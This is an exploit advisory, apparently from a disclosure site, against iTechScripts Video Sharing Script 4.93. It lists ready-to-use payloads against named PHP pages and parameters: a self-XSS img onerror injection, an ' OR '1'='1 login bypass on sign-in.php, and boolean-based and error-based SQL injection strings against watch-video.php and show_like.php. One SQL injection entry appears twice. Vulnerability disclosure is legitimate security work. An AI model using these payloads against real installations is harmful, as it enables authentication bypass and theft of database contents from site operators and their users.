iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

Published
Credit
Risk
2017.01.19
Hasan Emre Ozer
Medium
CWE
CVE
Local
Remote
CWE-89
CWE-79
N/A
No
Yes

Exploit Title : Video Sharing Script v4.93 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork : -
Date : 18/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/video-sharing-script/
<http://itechscripts.com/image-sharing-script/>
Sofware Price and Demo : $250
http://video-sharing.itechscripts.com
<http://photo-sharing.itechscripts.com/>

--------------------------------------------------------

Type: Self XSS
Vulnerable URL: http://localhost/[PATH]/sign-in.php
Vulnerable Parameters : usr_name
Method: POST
Payload:"><img src=i onerror=prompt(1)>
--------------------------------------------------------
Type: Login Bypass
Vulnerable URL: http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' OR '1'='1

--------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' RLIKE (SELECT (CASE WHEN (5118=5118) THEN 0x66616661 ELSE 0x28
END))-- kwfL
--------------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/watch-video.php
<http://localhost/%5BPATH%5D/list_temp_photo_pin_upload.php>
Vulnerable Parameters: v
Method: GET
Payload: ' AND (SELECT 6330 FROM(SELECT
COUNT(*),CONCAT(0x7170787871,(SELECT
(ELT(6330=6330,1))),0x71767a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- jvSl

--------------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/show_like.php
<http://localhost/%5BPATH%5D/list_temp_photo_pin_upload.php>
Vulnerable Parameters: vid
Method: GET
Payload: ' AND (SELECT 6330 FROM(SELECT
COUNT(*),CONCAT(0x7170787871,(SELECT
(ELT(6330=6330,1))),0x71767a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- jvSl
--------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' RLIKE (SELECT (CASE WHEN (5118=5118) THEN 0x66616661 ELSE 0x28
END))-- kwfL

--
Best Regards,
Hasan Emre


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com